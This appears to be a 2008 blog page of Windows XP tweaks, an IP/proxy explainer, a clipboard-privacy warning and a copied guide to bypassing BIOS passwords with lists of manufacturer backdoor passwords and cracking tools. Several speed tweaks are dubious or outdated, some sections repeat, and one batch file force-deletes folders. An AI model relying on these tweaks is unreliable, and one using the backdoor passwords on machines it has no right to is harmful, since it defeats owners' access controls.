Is Windows Seven will b totally Error Free ??

Saturday, May 31, 2008

Premium Username Password for many Sites..!!

This summary is not available. Please click here to view the post.

Friday, May 30, 2008

Send Password Protected Scrap in Orkut

There are 8 Different Styles that i have initially made.....


Just Paste this code in their scrap book.
Place ur message at Yourmessage by replacing it.
Place ur password at Yourpassword by replacing it.


Style 1:

Scrap with Password


Code


Scrap Without Password

Code


Style 2:



Code


Style 3:

Scrap with Password


Code




Scrap without Password


Code



Style 4:



Code



Style 5:




Code




Style 6:



Code



Style 7:




Code





Code




Place ur message at Yourmessage by replacing it.
Place ur password at Yourpassword by replacing it.

Have Fun!!

ULTIMATE GUIDE TO WINDOWS XP TWEAKS

DISABLE INDEXING SERVICES

Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:

1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next

OPTIMISE DISPLAY SETTINGS

Windows XP can look sexy but displaying all the visual items can waste system resources. To optimise:

1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons

DISABLE PERFORMANCE COUNTERS

Windows XP has a performance monitor utility which monitors several areas of your PC's performance. These utilities take up system resources so disabling is a good idea.

To disable:

1. download and install the Extensible Performance Counter List(http://www.usawarez.net/forum/redirector.php?url=http%3A%2F%2Fwww.microsoft.com%2Fwindows2000%2Fremove404.mspx)
2.Then select each counter in turn in the 'Extensible performance counters' window and clear the 'performance counters enabled' checkbox at the bottom.button below.


SPEEDUP FOLDER BROWSING

You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:

1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer

IMPROVE MEMORY USAGE

Cacheman Improves the performance of your computer by optimizing the disk cache, memory and a number of other settings.

Once Installed:

1.Go to Show Wizard and select All
2.Run all the wizards by selecting Next or Finished until you are back to the main menu. Use the defaults unless you know exactly what you are doing.
3.Exit and Save Cacheman
4.Restart Windows

OPTIMISE YOUR INTERNET CONNECTION

There are lots of ways to do this but by far the easiest is to run TCP/IP Optimizer.

1. Download(http://www.usawarez.net/forum/redirector.php?url=http%3A%2F%2Fwww.speedguide.net%2Ffiles%2Ftcpoptimizer.exe) and install
2. Click the General Settings tab and select your Connection Speed (Kbps)
3. Click Network Adapter and choose the interface you use to connect to the Internet
4. Check Optimal Settings then Apply
5. Reboot


OPTIMISE YOUR PAGEFILE

If you give your pagefile a fixed size it saves the operating system from needing to resize the page file.

1. Right click on My Computer and select Properties
2. Select the Advanced tab
3. Under Performance choose the Settings button
4. Select the Advanced tab again and under Virtual Memory select Change
5. Highlight the drive containing your page file and make the initial Size of the file the same as the Maximum Size of the file.

Windows XP sizes the page file to about 1.5X the amount of actual physical memory by default. While this is good for systems with smaller amounts of memory (under 512MB) it is unlikely that a typical XP desktop system will ever need 1.5 X 512MB or more of virtual memory. If you have less than 512MB of memory, leave the page file at its default size. If you have 512MB or more, change the ratio to 1:1 page file size to physical memory size.

RUN BOOTVIS - IMPROVE BOOT TIMES
download from(http://www.usawarez.net/forum/redirector.php?url=http%3A%2F%2Fwww.majorgeeks.com)
BootVis will significantly improve boot times

1. Download and Run
2. Select Trace
3. Select Next Boot and Driver Trace
4. A Trace Repetitions screen will appear, select Ok and Reboot
5. Upon reboot, BootVis will automatically start, analyze and log your system's boot process. When it's done, in the menu go to Trace and select Optimize System
6. Reboot.
7. When your machine has rebooted wait until you see the Optimizing System box appear. Be patient and wait for the process to complete

REMOVE THE DESKTOP PICTURE

Your desktop background consumes a fair amount of memory and can slow the loading time of your system. Removing it will improve performance.

1. Right click on Desktop and select Properties
2. Select the Desktop tab
3. In the Background window select None
4. Click Ok


REMOVE FONTS FOR SPEED


Fonts, especially TrueType fonts, use quite a bit of system resources. For optimal performance, trim your fonts down to just those that you need to use on a daily basis and fonts that applications may require.

1. Open Control Panel
2. Open Fonts folder
3. Move fonts you don't need to a temporary directory (e.g. C:\FONTBKUP?) just in case you need or want to bring a few of them back. The more fonts you uninstall, the more system resources you will gain.

DISABLE UNNECESSARY SERVICES

Because Windows XP has to be all things to all people it has many services running that take up system resources that you will never need. Below is a list of services that can be disabled on most machines:

Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:

Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable"


TURN OFF SYSTEM RESTORE

System Restore can be a useful if your computer is having problems, however storing all the restore points can literally take up Gigabytes of space on your hard drive. To turn off System Restore:

Open Control Panel
Click on Performance and Maintenance
Click on System
Click on the System Restore tab
Tick 'Turn off System Restore on All Drives'
Click 'Ok'

DEFRAGMENT YOUR PAGEFILE

Keeping your pagefile defragmented can provide a major performance boost. One of the best ways of doing this is to creat a separate partition on your hard drive just for your page file, so that it doesn't get impacted by normal disk usage. Another way of keeping your pagefile defragmented is to run PageDefrag. This cool little app can be used to defrag your pagefile, and can also be set to defrag the pagefile everytime your PC starts. To install:

Download(http://www.usawarez.net/forum/redirector.php?url=http%3A%2F%2Fwww.sysinternals.com) and Run PageDefrag
Tick "Defrag at next Reboot",
Click "Ok"
Reboot

SPEEDUP FOLDER ACCESS - DISABLE LAST ACCESS UPDATE

If you have a lot of folders and subdirectories on your computer, when you access a directory XP wastes a lot of time updating the time stamp showing the last access time for that directory and for ALL sub directories. To stop XP doing this you need to edit the registry. If you are uncomfortable doing this then please do not attempt.

Go to Start and then Run and type "regedit"
Click through the file system until you get to "HKEY_LOCAL_MACHINE\System\Cur rentControlSet\Control\FileSys tem"
Right-click in a blank area of the window on the right and select 'DWORD Value'
Create a new DWORD Value called 'NtfsDisableLastAccessUpdate'
Then Right click on the new value and select 'Modify'
Change the Value Data to '1'
Click 'OK'


DISABLE SYSTEM SOUNDS


Surprisingly, the beeps that your computer makes for various system sounds can slow it down, particularly at startup and shut-down. To fix this turn off the system sounds:

Open Control Panel
Click Sounds and Audio Devices
Check Place volume icon in taskbar
Click Sounds Tab
Choose "No Sounds" for the Sound Scheme
Click "No"
Click "Apply"
Click "OK"

IMPROVE BOOT TIMES

A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option in enables but on some builds it is not so below is how to turn it on.

Go to Start Menu and Click Run
Type in "Regedit" then click ok
Find "HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Dfrg\BootOpt imizeFunction"
Select "Enable" from the list on the right
Right on it and select "Modify"
Change the value to "Y to enable"
Reboot

IMPROVE SWAPFILE PERFORMANCE

If you have more than 256MB of RAM this tweak will considerably improve your performance. It basically makes sure that your PC uses every last drop of memory (faster than swap file) before it starts using the swap file.

Go to Start then Run
Type "msconfig.exe" then ok
Click on the System.ini tab
Expand the 386enh tab by clicking on the plus sign
Click on new then in the blank box type"ConservativeSwapfileUsage =1"
Click OK
Restart PC


DISABLE SYSTEM SOUNDS

Surprisingly, the beeps that your computer makes for various system sounds can slow it down, particularly at startup and shut-down. To fix this turn off the system sounds:

Open Control Panel
Click Sounds and Audio Devices
Check Place volume icon in taskbar
Click Sounds Tab
Choose "No Sounds" for the Sound Scheme
Click "No"
Click "Apply"
Click "OK"

IMPROVE BOOT TIMES

A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option in enables but on some builds it is not so below is how to turn it on.

Go to Start Menu and Click Run
Type in "Regedit" then click ok
Find "HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Dfrg\BootOpt imizeFunction"
Select "Enable" from the list on the right
Right on it and select "Modify"
Change the value to "Y to enable"
Reboot

IMPROVE SWAPFILE PERFORMANCE

If you have more than 256MB of RAM this tweak will considerably improve your performance. It basically makes sure that your PC uses every last drop of memory (faster than swap file) before it starts using the swap file.

Go to Start then Run
Type "msconfig.exe" then ok
Click on the System.ini tab
Expand the 386enh tab by clicking on the plus sign
Click on new then in the blank box type"ConservativeSwapfileUsage =1"
Click OK
Restart PC


MAKE YOUR MENUS LOAD FASTER

This is one of my favourite tweaks as it makes a huge difference to how fast your machine will 'feel'. What this tweak does is remove the slight delay between clicking on a menu and XP displaying the menu.

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood

MAKE PROGRAMS LOAD FASTER

This little tweak tends to work for most programs. If your program doesn't load properly just undo the change. For any program:

Right-click on the icon/shortcut you use to launch the program
Select properties
In the 'target' box, add ' /prefetch:1' at the end of the line.
Click "Ok"
Voila - your programs will now load faster.

IMPROVE XP SHUTDOWN SPEED

This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.

Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_LOCAL_MACHINE\System\Cur rentControlSet\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'


SPEED UP BOOT TIMES

This tweak works by creating a batch file to clear the temp and history folders everytime you shutdown so that your PC doesn't waste time checking these folders the next time it boots. It's quite simple to implement:

1. Open Notepad and create a new file with the following entries:

RD /S /q "C:\Documents and Settings\"UserName without quotes"\Local Settings\History"
RD /S /q "C:\Documents and Settings\Default User\Local Settings\History"
RD /S /q "D:\Temp\" <–"Deletes temp folder, type in the location of your temp folder">

2. Save the new as anything you like but it has to be a '.bat' file e.g. fastboot.bat or deltemp.bat

3. Click 'Start' then 'Run'

4. Type in 'gpedit.msc' and hit 'ok'

5. Click on 'Computer Configuration' then 'Windows Settings'

6. Double-click on 'Scripts' and then on 'Shutdown'

7. Click 'Add' and find the batch file that you created and then press 'Ok'

SPEED UP BOOT TIMES II

When your PC starts it usually looks for any bootable media in any floppy or cd-rom drives you have installed before it gets around to loading the Operating System from the HDD. This can waste valuable time. To fix this we need to make some changes to the Bios.

1. To enter the bios you usually press 'F2' or 'delete' when your PC starts

2. Navigate to the 'Boot' menu

3. Select 'Boot Sequence'

4. Then either move your Hard drive to the top position or set it as the 'First Device'

5. Press the 'Escape' key to leave the bios. Don't forget to save your settings before exiting

Note: Once this change has been made, you won't be able to boot from a floppy disc or a CD-rom. If for some strange reason you need to do this in the future, just go back into your bios, repeat the steps above and put your floppy or CD-rom back as the 'First Device'



SPEED UP BOOT TIMES III

When your computer boots up it usually has to check with the network to see what IP addresses are free and then it grabs one of these. By configuring a manually assigned IP address your boot time will improve. To do this do the following:

1. Click on 'Start' and then ''Connect To/Show All Connections'

2. Right-click your network adapter card and click 'Properties'.

3. On the 'General' tab, select 'TCP/IP' in the list of services and click 'Properties'

4.I n the TCP/IP properties, click 'Use the following address' and enter an IP address for your PC. If you are using a router this is usually 192.168.0.xx or 192.168.1.xx. If you are not sure what address you could check with your ISP or go to 'Start/run' and type 'cmd' and then 'ipconfig/all'. This will show your current IP settings which you will need to copy.

5. Enter the correct details for 'Subnet mask', 'Default gateway' and 'DNS Server'. Again if you are not sure what figures to enter use 'ipconfig/all' as in stage 4.

CHANGE YOUR PROCESSOR NAME

SHOW YOUR PC PENTIUM 5,6....OR MORE...

GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>
SYSTEM>CENTRAL PROCESSOR>

ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX

That's it..
now you have pantium 7 nine core PC..!!
Ha Ha Ha..!!

IP AND PROXY EXPALNATION

What is ip ?
Internet protocol is the set of techniques used by many hosts for transmitting data over the Internet

When we open any site like www.google.com from internet explorer or firefox or opera etc, it connects
to the site and site opened isnt it .... No thats not the process whole actually u all know maybe that every site has
its own ip like every pc has its own ip .....so what happens is when we enter site in IE ( or any other) it will connect to site ip like


www.google.com has ip 209.85.153.104
you can try this that u can whether type www.google.com or type http://209.85.153.104 both will open same google search site U CAN TRY THIS ON OTHER sites too just go to start - run - cmd ( press enter)

then type
ping www.google.com

or any other site instead of google like if i type in CMD ( COMMAND PROMPT )

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\hm>ping www.softarchive.net

Pinging www.softarchive.net [89.248.168.157] with 32 bytes of data:

Reply from 89.248.168.157: bytes=32 time=274ms TTL=39
Reply from 89.248.168.157: bytes=32 time=414ms TTL=39
Reply from 89.248.168.157:

so if we connect to site ip- why dont that site ip connects to us?
yeah it also connects in fact we can only see the site if its ip connect to us ( our ip )
like in simple terms
if we go to one girl house she will only allow us to enter her house if she knows about our house (that we belong to rich family or not lolz)

in above girl example that girl 's house is site ( or ip which we connecting) which we wanna view and our house is our own ip

so site will only allow us if it is connected to our own ip

i hope ip concept is clear




lets go to proxy
so our ip is visible to every site and hacker also because if we send email to any1 our ip is visible and if hacker get our ip then they can hack our pc
so what proxy is ?
it basically help us to hide our own ip instead of faking into real one
faking doesnot mean that we can fake to any ip in the world wheteher it exists or not answer no ip which we are replacing
must be present

how to fake an ip ?
for this we have to find REAL ip and its open port then put in lan setting of connection OF IE OR OPERA ETC

what is open port:?
u may see this type of ips like 23.234.6787.22:8080
in above, format is
IP:PORT
SO open port is basically that particular ip is connecting to. If this is right ip:port 23.234.6787.22:8080 we can say 23.234.6787.22
is connecting to port 8080

how to change ip manually or use proxies?

we can get it done thru 2 ways
1 is automatically ( that usually done by softwares i reccomend TOR, Easy hide ip -one can get it from
www.softarchive.net OR http://89.248.168.157 )
2nd is manually

click on TOOLS - INTERNET OPTIONS - CONNECTIONS - LAN - TICK MARK ON PROXY SETTING AND PUT IP:PORT

WE can easily get free proxies from many sites for free

so after puting proxy what happen is when u open any site ur real ip is hidden and proxy ( fake real ip ) u using is shown to the sites

COMPLETE GUIDE TO BIOS PASSWORD BYPASSING

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a pa**word. Unfortunately, BIOS passwords can also be a liability if a user forgets their pa**word, or changes the pa**word to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the pa**word on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS pa**word on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS pa**word yourself. They include:

Using a manufacturers backdoor pa**word to access the BIOS

Use pa**word crac*ing software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor pa**word is enabled. If the supervisor pa**word is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your pa**word. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect pa**word more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS pa**word HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer pa**word
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS pa**word if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator pa**word that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos pa**word recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - pa**word - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the pa**word has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the pa**word should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor pa**word is set. If you reset the BIOS pa**word, but cannot reset the hard drive pa**word, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS pa**word, you still have the option of using a professional service. pa**word Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Shocking News About Ctrl+c (the 'copy' Cmd)


> Please be very careful when u press Ctrl + C ..

> Here is some useful information for all.

> Ctrl+C may be the most important work we do
> everyday. But it's
> not a very
> safe thing to do. Read on to know why.

> What happens when you press Ctrl+C while you are
> Online... We do
> copy various data by Ctrl + C for copying & pasting
> elsewhere.

> This copied data is stored in clipboard and is
> accessible from
> the net by
> a combination of Javascripts and ASP.

> Just try this:
> 1) Copy any text by Ctrl + C
>
> 2) Click the Link: <

http://www.sourcecodesworld.com/special/clipboard.asp

http://www.sourcecodesworld.com/special/clipboard.asp


> 3) You will see the text you copied was accessed by
> this web
> page.

> Do not keep sensitive data (like passwords, credit
> card numbers,
> PIN etc.)
> in the clipboard while surfing the web. It is
> extremely easy to
> extract
> the text stored in the clipboard to steal your
> sensitive
> information.

See a suggestion from an expert:

> You can stop hacking of clipboard content by doing:

> Go to internet options of explorer -_ tools menu ->
> Internet
> option -> Security Custom level

> In settings - Select disable under allow past
> operations via
> script.

I HOPE DIS WILL B HELP FUL FOR U GUYS.. SO I NEED REPS.. FOR DIS.

ADDING APPLICATION TO THE RIGHT CLICK


Here is how to add any application to the Context Menu when you right click on any Folder. This way you do not have to always go to the Start Menu. When you right click on any folder, you can have access to that application, the same as using Sent To.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key to the "Shell" Key and name it anything you like.
4. Give it a default value that will appear when you right click a folder, i.e. NewKey (use an "&" without the quotes, in front of any character and it will allow you to use the keyboard)
5. Click on the Key HKEY_CLASSES_ROOT\Folder\shell\NewKey
6. Add a New Key named Command
7. Set the (Default) value of the application you want to run
8. For example: c:\program files\internet explorer\iexplore.exe (Include the full path and parameters if you need them)

HIDING YOUR COMPUTER FROM NETWORK NEIGHBOURHOOD

Hiding a XP Computer from Network Neighborhood

I had tried this and better members can do this from preventing the others to see your comp.


If you want to share files from a XP computer,
yet want to remove it from showing up in the Network Neighborhood,

Run net config server /hidden:yes

MAKE A WEBSITE YOUR DESKTOP WALLPAPER

Do u know that in place of some silly still image you can have a fully functioning website as your wallpaper in the desktop background???

Well yes, you can!
all you gotta do is right click on the desktop
---> go to properties
---> then under desktop tab select Customize desktop
---> there under web tab click new
---> type in the complete url

AND HERE YOU GO WEBSITE IS YOUR WALLPAPER NOW

Windows Seven...Take a Look

As all we know that the biggest blast from Microsoft is their upcoming OS
Windows 7
and they are making them 100% Error free system!!
here's the some of the screen shot of the Windows 7









Thursday, May 29, 2008

WINDOWS XP TRICKS

Enable Quicker Startups with a Boot Defragment

There is a way to speed up XP startup: make your system do a boot defragment, which will put all the boot files next to one another on your hard disk. When boot files are in close proximity to one another, your system will start faster.

On most systems, boot defragment should be enabled by default, but it may not be on yours, or it may have been changed inadvertently. To make sure that boot defragment is enabled on your system, run the Registry Editor [Hack #68], and go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction
Edit the Enable string value to Y if it is not already set to Y. Exit the Registry and reboot. The next time you reboot, you'll do a boot defragment.





STARTUP AND SHUTDOWN


A grab bag of ways to customize the way you start up and shut down your system.

There are many small ways that you can control the way you start up and shut down your PC. This grab bag of four hacks shows you the best of them.

1.7.1 Create One-Click Shutdown and Reboot Shortcuts
Turning off or rebooting XP involves a several-step process: click the Start menu, choose Shut Down, and then select Shut Down or Restart. If you want, however, you can exit or reboot much more quickly, by creating a shortcut that enables one-click shutdowns. You can also use the shortcut to customize the shutdown or reboot—for example, by displaying a specific message or automatically shutting down any programs that are running.

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "See you later!"
shutdown -r -t 03 -c "You can't get rid of me that quickly!"
Table 1-3. Switches you can use with shutdown Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message



CHANGE DESKTOP ICONS

You can change the desktop icons of system objects that appear to have unchangeable icons.

First, using Table 2-3, find the CLSID for the object whose icon you want to change. Then run the Registry Editor, go to HKEY_CLASSES_ROOT\CLSID, and look for the CLSID subkey from Table 2-3 for the object whose icon you want to change. Open the subkey and then the DefaultIcon subkey under that. For example, to change the icon for My Computer, open the subkey HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon. Change the Default value to the path of the icon that you want displayed. Exit the Registry. You may have to reboot in order for the new settings to take effect.


CLSID:-



My Computer
{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Recycle Bin
{645FF040-5081-101B-9F08-00AA002F954E}

Microsoft Outlook
{00020D75-0000-0000-C000-000000000046}

Internet Explorer
{FBF23B42-E3F0-101B-8488-00AA003E56F8}

The Internet
{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}

My Network Places
{208D2C60-3AEA-1069-A2D7-08002B30309D}

Briefcase
{85BBD920-42A0-1069-A2E4-08002B30309D}

Dial-Up Networking
{992CFFA0-F557-101A-88EC-00DD010CCC48}


REGISTRY TWEAKS



Prefetching (the reading of system boot files into a cache for faster loading) is a commonly overlooked component that can have a significant impact on system boot time. This tweak allows you to select which components will make use of the prefetch parameters. To see which files are gathered using each of the settings, clear the prefetch cache located at C:\Windows\Prefetch and then enable one of the settings listed in this hack. Clear the cache and repeat for each setting.

Set the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher to 0 to disable prefetching, 1 to prefetch application launch files, 2 to prefetch boot files, or 3 to prefetch as many files as possible.



BRAND WINDOWS WITH YOUR NAME


open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
***********************************************
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
************************************************
1. Save the file as OEMINFO.INI in the c:\windows\system32.
2. Then make a right click on my computer select properties, in the general tab see suppport



ADDING APPLICATION TO THE RIGHT CLICK


Here is how to add any application to the Context Menu when you right click on any Folder. This way you do not have to always go to the Start Menu. When you right click on any folder, you can have access to that application, the same as using Sent To.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key to the "Shell" Key and name it anything you like.
4. Give it a default value that will appear when you right click a folder, i.e. NewKey (use an "&" without the quotes, in front of any character and it will allow you to use the keyboard)
5. Click on the Key HKEY_CLASSES_ROOT\Folder\shell\NewKey
6. Add a New Key named Command
7. Set the (Default) value of the application you want to run
8. For example: c:\program files\internet explorer\iexplore.exe (Include the full path and parameters if you need them)



CHANGE YOUR PROCESSOR NAME



SHOW YOUR PC PENTIUM 5,6....OR MORE...

GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>
SYSTEM>CENTRAL PROCESSOR>

ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX


Add Copy To And Move To Options When U Right Click


Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path,
its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

